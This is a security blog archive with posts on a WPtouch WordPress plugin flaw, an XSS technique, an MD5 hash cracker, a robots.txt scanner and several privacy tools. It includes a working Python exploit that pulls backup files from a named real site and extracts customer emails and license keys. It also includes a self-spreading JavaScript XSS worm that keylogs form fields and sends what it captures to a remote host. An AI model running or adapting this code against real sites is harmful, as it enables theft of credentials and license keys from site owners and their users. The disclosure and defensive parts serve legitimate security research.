Archive for the ‘Programming’ Category

0day: Extracting WPtouch Mobile Plugin License Keys

Wednesday, September 24th, 2014

With 6,030,141 downloads the WPtouch Mobile Plugin is currently the 24th most popular WordPress plugin. The plugin offers “pro” functionality for which the users need to pay money. WPtouch suffers from information disclosure vulnerabilities, and today I’m going to demonstrate how to steal license keys. The vulnerabilities seem to affect most versions up until the current 3.4.10, I have not been bothered to test them all.

Having a quick peak at the pro functionality we can discover this beauty:

wptouch_add_pro_setting(
         'checkbox',
         'automatically_backup_settings',
         sprintf( __( 'Automatically backup settings to the %s folder', 'wptouch-pro' ),
         '<em>/wptouch-data/backups</em>' ),
         wptouchize_it( __( 'WPtouch Pro backups your settings each time they are saved.', 'wptouch-pro' ) ),
         WPTOUCH_SETTING_BASIC,
         '3.0'
),

Sounds like a good idea, right? Automatically backing things up, only a fool would mind that!

Let’s have a look at the wptouch_backup_settings() function located in core/admin-backup-restore.php:

$backup_string = base64_encode( gzcompress( serialize( $settings_to_save ), 9 ) );

$backup_base_name = 'wptouch-backup-' . date( 'Ymd-His') . '.txt';
$backup_file_name = WPTOUCH_BACKUP_DIRECTORY . '/' . $backup_base_name;
$backup_file = fopen( $backup_file_name, 'w+t' );
if ( $backup_file ) {
        fwrite( $backup_file, $backup_string );
        fclose( $backup_file );
}

What this tells us is that we can reverse the backup storing procedure and reading the contents of backup files by:

base64_decode(unserialize(gzuncompress(file_get_contents($backup_file_name))));

Naturally, that is more or less precisely what wptouch_restore_settings() does. wptouch_backup_settings() pretty much uses the same call to wptouch_get_settings() as anything else whenever a WPtouch setting needs to be read. It calls the get_settings(), the general method for loading settings, and returns them as expected.

When WPtouch is being configured it calls wptouch_create_directory_if_not_exist() for each directory required by the plugin to function. This is because the plugin relies on directories outside the traditional wp-content/plugins/ directory.

Namely, for backups, WPtouch creates either the wp-content/uploads/wptouch-data/ OR wp-content/wptouch-data/ hierarchy. (There appears to be some sort of difference between versions or installations, something that I have chosen not to dig very deeply into.) By default WordPress is shipped with an index.php file for preventing directory listing in the wp-content directory.

Yeah, you guessed it: WPtouch doesn’t protect the directory listing of its wptouch-data/backups/ directory. This leaves its often automatically created backups, named as ‘wptouch-backup-‘ . date( ‘Ymd-His’) . ‘.txt’, completely accessible to anybody that knows where to look. Although, the wptouch-data and wp-content directories may of course be renamed and being able to determine their paths is a given for this to work (dork inurl:”wptouch-data”).

When get_settings() is called by the backup routine it includes the plugin’s “BNCID” settings which, in turn, contains the customer’s configured e-mail address, license key and WordPress admin nonce. So I guess you could say that an undocumented pro function of WPtouch is to publicly share the pro user’s credentials so that nobody else needs to acquire them on their own. :-)

Proof of Concept

Hacking it all up targeting the least popular site I could find with my very low patience:

#!/usr/bin/env python2
import mechanize
import lxml.html
import phpserialize
import zlib
import base64

WP_CONTENT_URL = "http://holliava.com.au/wordpress/"
haystack = "wp-content/uploads/wptouch-data/backups/"

b = mechanize.Browser()
b.addheaders = [("User-Agent", "MAsTER hAs AWardEd mE yOuR wpTouCh lICeNSe KeY :PppPPppp")]
b.set_handle_robots(False)

url = WP_CONTENT_URL + haystack
print("[+] KnocKING: %s" % (url))

b.open(url)
r = b.response()
d = lxml.html.parse(r).getroot()
needles = [link.attrib.get("href") for link in d.xpath("//a")]

if len(needles) <= 1:
    raise Exception("[-] NO FILez such fAIl ")

print("[+] wOw mUcH fiLE")

for needle in needles:
    if "wptouch-backup-" in needle:
        url = WP_CONTENT_URL + haystack + needle
        d = b.open(url).read()
        objs = phpserialize.loads(zlib.decompress(base64.b64decode(d)), object_hook=phpserialize.phpobject)
        dict = objs[b"bncid"]._asdict()
        cust_email = dict[b"bncid"].decode("utf-8")
        license_key = dict[b"wptouch_license_key"].decode("utf-8")
        print("[+] %s: %s %s" % (needle, cust_email, license_key))

By running it we get (slightly censored):

$ ./sploit.py 
[+] KnocKING: http://holliava.com.au/wordpress/wp-content/uploads/wptouch-data/backups/
[+] wOw mUcH fiLE
[+] wptouch-backup-20131013-022334.txt: [email protected] acb7f-CENSORED-b25b0-a71a8

Possible fixes

  • Deny www access to the WPtouch backup directory and contained files
  • Optionally encrypt the WPtouch backup files with unique keys (per installation or by passphrase)
  • Optionally exclude critical information (is it really necessary for the plugin to backup the license key?)

Solving the browser crypto problem

Sunday, July 14th, 2013

Many developers have worked hard to port critical cryptographic functionality to JavaScript. We all agree that there is a clear requirement in a safer world to have asymmetric crypto support in the web. Porting code to JavaScript is great for users that don’t really care about the strength but only that the data is encrypted. Those people usually believe that they do not need perfect crypto, as long as it is any form of crypto it is “good enough” for them.

There are many problems with porting cryptographic functions directly to JavaScript and we see many great ideas failing on doing things properly. JavaScript cryptography is very young when comparing its lifespan to established binary solutions, such as GnuPG, that have been audited for long. GnuPG has been around since 1999 and GPG4Browsers, now OpenPGP.js, since 2011.

Auditing JavaScript ports leads to better design and less failures in time, but even when everything has been solved some problems remain due to design. Web browsers live in a very hostile world and we systematically witness XSS vulnerabilities and 0day exploits which enable dumping critical data, like private keys, as soon as either the DOM or HTML5 local storage is accessed. We can take care of badly implemented cryptography but we can’t take care of the way that the JavaScript implemented cryptography is accessible to anything that can execute JavaScript in the correct environment. As long as cryptography is done in JavaScript this will always be a huge threat.

The users that care more about their security and privacy are demanding solutions aligned with their requirements, and JavaScript implemented cryptography is by design insecure due to the surrounding threats in its domain. These users are actively choosing not to use JavaScript ported functionality but instead continue to use their local binaries that have been around and audited for decenniums more than newborn ports. And they are completely correct in doing so, because how can we actually trust JavaScript? We are stepping over the security requirements in order to deliver working solutions faster than science can keep up with it. We are impatient and we need something to work as soon as possible, especially in modern day and age with the ongoing war against free unmonitored online communication. By doing so we bypass the most important core ideas of implemented cryptography: security and privacy.

The solution

In order to expose GnuPG functionality to the web we must create an API for it which can perform cryptographic operations with non sensitive elements, such as armored public keys and private key metadata, without exposing anything of importance. The best way of doing it and successfully integrating it into web browsers is to run a webserver locally which pre accepted remotely served content can communicate with. The most important detail is that private keys should never ever be available for the web browser but instead reside in the local GnuPG keyring which the API manipulates through the local GnuPG binary.

I came up with a solution that I named pygpghttpd which I am currently working on supporting in my OpenPGP plugin for Roundcube: rc_openpgpjs. pygpghttpd is an open source minimalistic HTTPS server written in Python. pygpghttpd exposes an API enabling GnuPG’s cryptographic functionality to be used in web browsers and other software which allows HTTP requests. pygpghttpd runs on the client’s localhost and allows calling GnuPG binaries from the user’s browser securely without exposing cryptograhically sensitive data to hostile environments. pygpghttpd bridges the required elements of GnuPG to HTTP allowing its cryptographic functionality to be called without the need to trust JavaScript based PGP/GPG ports. As pygpghttpd calls local GnuPG binaries it is also using local keyrings and relying on it entirely for strength. In short pygpghttpd is just a dummy task router between browser and GnuPG binary.

pygpghttpd acts as a HTTPS server listening on port 11337 for POST requests containing operation commands and parameters to execute. When a request is received it checks the “Origin”, or if missing the “Referer”, HTTP header to find out which domain served the content that is contacting it. It then detects if the domain is added to the “accepted_domains.txt” file by the user to ensure that it is only operational for pre accepted domains. If the referring domain is accepted it treats the request and serves the result from the local GnuPG binary to the client. In the response a Cross-origin resource sharing HTTP header is sent to inform the user’s browser that the request should be permitted. If the referring domain is missing from accepted_domains.txt the user’s browser forbids the request in accordance with the same origin security policy.

The HTTPS certificate used by pygpghttpd is self signed and is not used with the intention to enhance security since all traffic is isolated to the local network interface. It uses HTTPS to ensure that both HTTPS and HTTP delivered content can interact with it.

pygpghttpd exposes metadata for both private and public keys but only allows public keys to be exported from the local keyring. The metadata for private keys is enough for performing cryptographic actions. Complete keypairs can be generated and imported into the local keyring.

For example, generating a keypair with cURL:

curl -k –data “cmd=keygen&type=RSA&length=2048&name=Alice&[email protected]&passphrase=foobar” -H “Origin: https://accepted.domain.com” https://localhost:11337/

Or from JavaScript:

$.post("https://localhost:11337/", {
  cmd: "keygen",
  type: "RSA",
  length: "2048",
  name: "Alice",
  email: "alice\@foo.com",
  passphrase: "foobar"
}, function(data) {
  if(data == "1")
    return true;
  return false;
});

Please see the project on Github, API documentation and example for full details.

rc_openpgpjs: Ending seven years of Roundcube insecurity

Monday, January 7th, 2013

Roundcube is a popular open source IMAP webmail application. Roundcube is used by Harvard University, UC Berkeley and University of Michigan. Apple Mac OS X 10.7 uses Roundcube per default in its Mail Server. While writing this a lazy Google dork estimates 133 000 public Roundcube installations.

PGP support was first requested seven years ago and set critical six years ago. PGP support has been requested actively ever since. One of the core developers began the development of his PHP implementation, the Enigma plugin, two years ago but the plugin has not been made functional yet.

Today I am proud to release a beta version of my Roundcube plugin that implements PGP using the OpenPGP.js (based on GPG4Browsers) JavaScript library. rc_openpgpjs enables OpenPGP to function in the user’s browser so that fundamental key storage security isn’t immediately broken by design, in opposite to the official Enigma plugin.

At its current beta stage; rc_openpgpjs is able to generate an encryption key pair, save it in HTML5 web storage (in your own browser, guys) and perform encryption and decryption of email. rc_openpgpjs works in any modern browser that can parse HTML5 and supports the window.crypto object. Unfortunately this is limited to Google Chrome today, but Mozilla is struggling working on it.

rc_openpgpjs is available on Github. rc_openpgpjs will become stable as soon as some small glitches have been corrected. It has been written for Roundcube 0.8.4 with the Larry skin.

Introducing TrueCrypt Volume Manager

Saturday, January 5th, 2013

Linux has DM-CRYPT, FreeBSD has GEOM_ELI and Oracle is holding ZFS encryption options closed source. The incompatible nature of encrypted storage throughout various UNIX systems is an obvious problem. TrueCrypt supports most popular platforms but until now there hasn’t been a simple way to organize and maintain TrueCrypt containers over different types of systems. TrueCrypt Volume Manager aims to be this bridge.

TrueCrypt Volume Manager, shortened TCVM, is a UNIX shell environment written in Python. It provides a simple CLI shell interface to easily create, mount, unmount and list containers and also the possibility to easily change the passphrase of a given encryption container. Since TCVM is intended to run as a UNIX shell this allows you to securely administrate your TrueCrypt containers over the SSH protocol.

TCVM also provides the function to automatically generate secure passphrases for TrueCrypt containers and store the passphrases in a separate container. This function is fully optional to use and is essentially inspired by the KeePass project. TCVM flexes a custom wrapper for TrueCrypt.

Please note that TCVM is still new and may be slightly rough around the edges. I am happy to fix any issue you may encounter.

The project is available on Github.

Introducing panic_bcast

Thursday, December 13th, 2012

panic_bcast is a network protocol panic button operating decentralized through UDP broadcasts and HTTP. It’s intended to act a panic button in a sensitive network making it harder to perform cold boot attacks. A serious freedom fighter will run something like this on all nodes in the computerized network.

How it works

1. An activist has uninvited guests at the door
2. The activist sends the panic signal, a UDP broadcast, with panic_bcast
3. Other machines in the network pick up the panic signal
4. Once panic_bcast has picked up the panic signal it kills truecrypt and powers off the machine.

panic_bcast was written with the intention to support any form of UNIX that can run Python. It has been tested successfully on Linux and FreeBSD.

To trigger the panic signal over HTTP simply request http://…:8080/panic from a machine that is running panic_bcast. Whichever will do.

Please note that panic_bcast is a beta and more sophisticated ways to prevent cold boot attacks are planned. You can view these plans by searching for the word “TODO” in the source code.

The source code is available on Github.

Remember kids: there’s no home for swap in opsec.

Presenting DNSDH

Thursday, March 29th, 2012

DNSDH is a protocol for exchanging cryptographic keys using the Diffie-Hellman algorithm. Instead of exchanging keys traditionally, the clients speak to a bogus DNS server to initiate an encrypted session in an existing channel of communication. The cryptographically relevant packets travel through a data path that appear to be normal domain name resolve queries to remain stealth and effective even behind limited and surveillanced networks. Please understand that the DNS server is only pretending to be a server for performing name lookups by using its language but performing different tasks.


The bogus DNS server is the center of the key exchange. It uses memcached to store data in memory and deletes any output after it’s been delivered to its recipient. The point of DNSDH is to establish a reliable network enabling anything that can perform a DNS request to exchange cryptographic keys using discrete bogus domain name queries. The nodes communicating, Alice and Bob, could possibly be two cellphones, IRC clients or even death stars. It’s also a great blast to teasingly merge cryptographic key exchanges with traffic that is rarely looked at by network administrators unless they want to censor or monitor you.

When initializing the session Alice first declares the values of p, g and Alice’s private key (alice_private) and then queries the bogus DNS server with dnsdhinit.p.g.alice_public. The DNS server creates a sessionid and stores it in the memory with the data provided in Alice’s query. Alice tells Bob that she wants to talk privately and sends him a packet containing the sessionid provided by the DNS server. Bob queries the DNS server with the sessionid recieved from Alice. The DNS server replies with the information provided in Alice’s query. Bob then proceeds by declaring his own private key (bob_private) and calculates the value of his public key: g^bob_private mod p. Bob can then calculate the secret he shares with Alice: alice_public^bob_private mod p. Then Bob queries the DNS server with dnsdhinit.bob_public, receives an id and sends it to Alice in a packet. Alice then queries the DNS server with the id, receives bob_public and calculates the secret she shares with Alice: bob_public^alice_secret mod p.

Alice

$ ./client.example.pl 1337 1338 init
[+] Generating keys...
[+] alice_pub_key: 7
[+] alice_priv_key: 19
[+] Query dnsdhinit.23.5.7
[+] SEND DNSDH_INIT: 6035559
[127.0.0.1:58602]: DNSDH_FINISH: 9300804
[+] Query sessionid.9300804
[+] p: 23
[+] g: 5
[+] bob_public: 1
[+] Shared secret: 1

Bob

$ ./client.example.pl 1338 1337
[127.0.0.1:60267]: DNSDH_INIT: 6035559
[+] Query sessionid.6035559
[+] p: 23
[+] g: 5
[+] alice_public: 7
[+] Generating keys...
[+] bob_pub_key: 1
[+] bob_priv_key: 0
[+] Shared secret: 1
[+] Query dnsdhinit.1
[+] SEND DNSDH_FINISH: 9300804

Source code

The source code is available on Github.

Eliminating the myths of XSS attacks

Thursday, December 8th, 2011

In this post I will introduce you to undiscovered usages of an XSS, and also demonstrate how to transform a non-persistent XSS to a persistent and make an actual practical threat. Cross site scripting attacks are listed as number two on OWASP’s top 10 list of application security risks year 2010, and I wouldn’t expect those numbers to drop anytime soon.

The used attack vectors of an XSS are quite simple:

  1. Attacker injects code into data which the server reflects, other users visit the page where the malicious code is displayed and get their cookies stolen.
  2. Attacker injects code into request parameters that the server reflects, sends infected URI to the victim user whose cookie is stolen.
  3. Attacker injects code that exploits unknown web browser vulnerability to install malware on the users computer into request parameters that is somehow (either through number one or number two) executed by the user.
  4. Attacker injects malicious login form and performs a phishing attack on the victim.

That’s pretty much it. When an XSS is demonstrated, persistent or not, a researcher will throw a JavaScript alert() message or inject a cookie stealer. In the eye of the unconscious developer of the site, your alert() doesn’t mean anything. Fake JavaScript page defacements don’t mean a thing either. “Oh, you can give me a warning? Good for you.” The only time they will act is when your injection can somehow mess up the way the page looks. And not because it’s a security risk, but because it’s messing up their layout.

Nobody cares about stolen cookies. And why would they? Cookies are not the issue. It’s common praxis to require re-authentication, like password input, besides session values to change things that will affect requiring new session values: new e-mail address, new password, etc. In truly sensitive systems cookies should be bound to the user’s IP address, and if the attacker has local access to the victim’s IP address there are so many attack possibilities that the cookie isn’t the victim’s largest problem.

I believe that it’s safe to assume that the popularity of unpatched XSS vulnerabilities is due to warnings about nonthreatening threats. “Hey man, check this out. I totally just alert(‘hax’):ed your site locally in my own browser without affecting anybody!” Nobody is going to take that seriously.

Keep in mind that there’s a huge differentiating detail between a vulnerable GET and POST parameter. For logical reasons web browsers perform GET requests by default, and maliciously getting a user to submit something with an infected POST parameter is (“should” be) harder than giving them a link.

Broadening the scope of an XSS attack

As a demonstration of what JavaScript is truly capable of when used for malicious purposes, I have written a self aware virus that infects links and forms (href and action attributes) with its own payload when an infected victim’s web browser renders the page. The virus looks for a query parameter containing \%3c\%73\%63\%72\%69\%70\%74 (<script) in the query of an URI and then infects the target destinations with itself so that it’s kept for a longer period than just the one page the user is viewing. It should logically always find at least one occurrence of itself, otherwise it wouldn’t execute to begin with.

This way, the virus spreads through transformation from a non-persistent XSS injection to a semi-persistent. It exercises worm-like behavior; not in the sense of spreading user->user, but page->page. It is, however, user borne if infected links are copied between multiple users. By infecting action attributes of form elements the infection is also active after the user has executed a login or logout, unless the web server performs a redirect to an uninfected URI.

Wonderfully enough, it’s possible to pass any GET parameters with any value you want to an httpd without breaking anything. You could GET http://www.nsa.gov/?bat=man without breaking anything, unhandled parameters are completely ignored. Thus our virus can be very aggressive about infection: the infected victim wouldn’t tell a difference either way. It’s quite unrare that a vulnerable CMS or MVC will allow the same vulnerable parameter to be passed to any visually rendered part of the site. Remember American Express?

Either way, login credentials are sent to a remote location controlled by the attacker. All form elements are hooked up with a keylogger. By default, the virus makes HTTP requests to an URI controlled by the attacker, and requests the logged information making it show up in logs like GET /username=foo,password=bar It is very easy to hook it up with additional sniffing, e.g. parsing the rendered website for credit card information.

It’s written to be entirely independent of bloated JavaScript libraries and plugins to keep it as light weight as possible at execution. It’s still an educational proof of concept though, and some bugs are intentionally left unfixed.

// Inject param=payload into target
function inject(target, param, payload)
{
  if(!target.match("\\?"))
    return target + "?" + param + "=" + payload;
  return target + "&" + param + "=" + payload;
}

// Sends data to remote location
function snatch(data)
{
  var i = document.createElement("img");
  i.src = "http://127.0.0.1/" + data;
}

window.onload = function()
{
  window.location.toString().match(/\?(.+)/);
  var query = RegExp..split("&");

  for(i = 0; i < query.length; i++)
  {
    var tmp = query[i].split("=");
    var unescaped = unescape(tmp[1]);
    var payload = "";

    for(x = 0; x < unescaped.length; x++)
      payload += '%' + unescaped.charCodeAt(x).toString(16);

    // Found self
    if(payload.match("\%3c\%73\%63\%72\%69\%70\%74"))
    {
      var param = tmp[0];
      break;
    }
  }

  // Infect href elements
  var links = document.getElementsByTagName("a");
  for(i = 0; i < links.length; i++)
    links[i].href = inject(links[i].href, param, payload);

  var forms = document.getElementsByTagName("form");
  for(i = 0; i < forms.length; i++)
  {
    // Infect action elements
    document.forms[i].action = inject(forms[i].action, param, payload);

    // Initialize keylogger
    document.forms[i].onsubmit = function()
    {
      var logged = new Array();
      for(x = 0; x < this.elements.length; x++)
        if(this.elements[x].type != "submit")
          logged[x] = this.elements[x].type + "=" + this.elements[x].value;
      snatch(logged);

      return true;
    }
  }
}

UPDATE: The method of spreading was first introduced in the BeEF framework

BozoCrackPHP

Sunday, November 13th, 2011

BozoCrack is a depressingly effective MD5 password hash cracker with almost zero CPU/GPU load. Instead of rainbow tables, dictionaries, or brute force, BozoCrack simply finds the plaintext password. Specifically, it googles the MD5 hash and hopes the plaintext appears somewhere on the first page of results.

It works way better than it ever should.

BozoCrack was originally written in Ruby and published on GitHub by juuso. I liked the idea, and figured I’d do a PHP port:

<?php
/**
 * BozoCrack is a depressingly effective MD5 password hash
 * cracker with almost zero CPU/GPU load. Instead of
 * rainbow tables, dictionaries, or brute force, BozoCrack
 * simply finds the plaintext password. Specifically, it
 * googles the MD5 hash and hopes the plaintext appears
 * somewhere on the first page of results.
 *
 * Original BozoCrack can be found on https://github.com/juuso/BozoCrack
 *
 * Ported from Ruby to PHP by Niklas Femerstrand, qnrq.se, 2011
 * License: http://sam.zoy.org/wtfpl/
 */

if(!isset($_SERVER['argv'][1]))
  die("Usage example: $ php bozocrack.php file_with_md5_hashes.txt\n");

$fileContents = file_get_contents($_SERVER['argv'][1]);
preg_match_all("/\b([a-fA-F0-9]{32})\b/", $fileContents, $hashes);
$hashes = array_unique($hashes[0]);
printf("Loaded %s unique hashes\n", count($hashes));

foreach($hashes as $hash)
{
  $response = file_get_contents("http://www.google.com/search?q={$hash}");
  $wordlist = preg_split("/\s+/", $response);
  foreach($wordlist as $word)
  {
    if($hash == md5($word))
    {
      printf("%s:%s\n", $hash, $word);
      break;
    }
  }
}

robots.txt scanner proof of concept

Friday, October 7th, 2011

Due to the recent scandal of American Express listing their publicly available admin debug panel in their robots.txt file, here’s a sloppy proof of concept that can be used to find similar security issues.

Remember:

  • robots can ignore your /robots.txt. Especially malware robots that scan the web for security vulnerabilities, and email address harvesters used by spammers will pay no attention.
  • the /robots.txt file is a publicly available file. Anyone can see what sections of your server you don’t want robots to use.

http://www.robotstxt.org/robotstxt.html

Either way, a location such as /us/admin/ would be in any wordlist of interesting locations and you should always protect sensitive parts of your system with authorization requirements.

<?php
/**
 * Quick hack to determine HTTP status codes of locations listed in a host's
 * robots.txt file.
 * Author: Niklas Femerstrand, qnrq.se, 2011
 * License: http://sam.zoy.org/wtfpl/
 */

// Determine HTTP status code of $file on $host
function httpstatus($host, $file) {
   $fp = fsockopen($host,80,$errno,$errstr,30);
   $out = "GET /$file HTTP/1.1\r\n".
          "Host: $host\r\n".
          "Connection: Close\r\n\r\n";
   fwrite($fp,$out);
   $response = fgets($fp);
   return chop($response);
}

if (!$argv[1])
	die("usage: $ php robotscan.php <host>\n   eg: $ php robotscan.php www.google.com\n");

$host = preg_replace("/\/$/", "", $argv[1]);
$target_url = $argv[1] . "/robots.txt";

$filters = array("/[ ]?Allow:[ ]?/",
                 "/[ ]?Disallow:[ ]?/",
                 "/[ ]?Sitemap:.*/",
                 "/[ ]?Request-rate:.*/",
                 "/[ ]?Crawl-delay:.*/",
                 "/[ ]?Visit-time:.*/",
                 "/.*[$*].*/",
                 "/User-agent: .*/",
                 "/#+.*/");

echo "[+] Getting robots.txt content\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "{$argv[1]}/robots.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
$robots = curl_exec($ch);

if(!$robots)
{
	$httpStatus = httpstatus($host, "robots.txt");
	if(preg_match("/200 OK/", $httpStatus))
		die("[-] robots.txt exists but seems empty\n");
	else
		die("[-] {$httpStatus}\n");
}
elseif(preg_match("/([\<])([^\>]+)*([\>])/i", $robots))
	die("[-] robots.txt is incorrectly formatted (html?)\n");
else
{
	$robots = preg_replace($filters, "", $robots);
	$robots = preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $robots);
	$arr = explode("\n", $robots);

	foreach($arr as $loc)
		printf("[+] %s: %s\n", "{$host}{$loc}: ", httpstatus($host, $loc));
}

Erroneous cryptography usage in reCAPTCHA API

Friday, September 2nd, 2011

As a developer you’ll definitely stumble upon a lot of ugly code, and sometimes some snippets are just plain “wtf?”. I found this one by an accident a couple of months ago while browsing through the reCAPTCHA API library developed by Google. First, let’s take a quick look at the PHP manual for a libmcrypt introduced function called mcrypt_encrypt():

string mcrypt_encrypt ( string $cipher , string $key , string $data , string $mode [, string $iv ] )

reCAPTCHA offers a way to only display email addresses to users that solve a CAPTCHA (catchy, huh?) called Mailhide. The Mailhide part of recaptchalib declares a function called _recaptcha_aes_encrypt() and it is declared as below:

function _recaptcha_aes_encrypt($val,$ky) {
        if (! function_exists ("mcrypt_encrypt")) {
                die ("To use reCAPTCHA Mailhide, you need to have the mcrypt php module installed.");
        }
        $mode=MCRYPT_MODE_CBC;
        $enc=MCRYPT_RIJNDAEL_128;
        $val=_recaptcha_aes_pad($val);
        return mcrypt_encrypt($enc, $ky, $val, $mode, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
}

As you can see, the initialization vector (the last parameter of mcrypt_encrypt()) used is statically defined as a nullbyte string. If you’ve studied cryptography to some extent you probably know that the entire purpose of the initialization vector is to ensure that the same data encrypted with the same key outputs different ciphertext, just like the purpose of a password salt is to generate different hashes for equal password strings in authentication.

By using the \0 IV string Google simply silences a warning which PHP would generate if mcrypt_encrypt() would be called using Rijndael in CBC mode without a specified IV, thus it is possible that the used IV is nothing but a fix of this warning. However, using a static nonrandom IV makes the algorithm susceptible to dictionary attacks. _recaptcha_aes_encrypt() may not be a very important part of the reCAPTCHA API to keep secure, but a very easy solution to this would be to use another block cipher mode which does not require an initialization vector.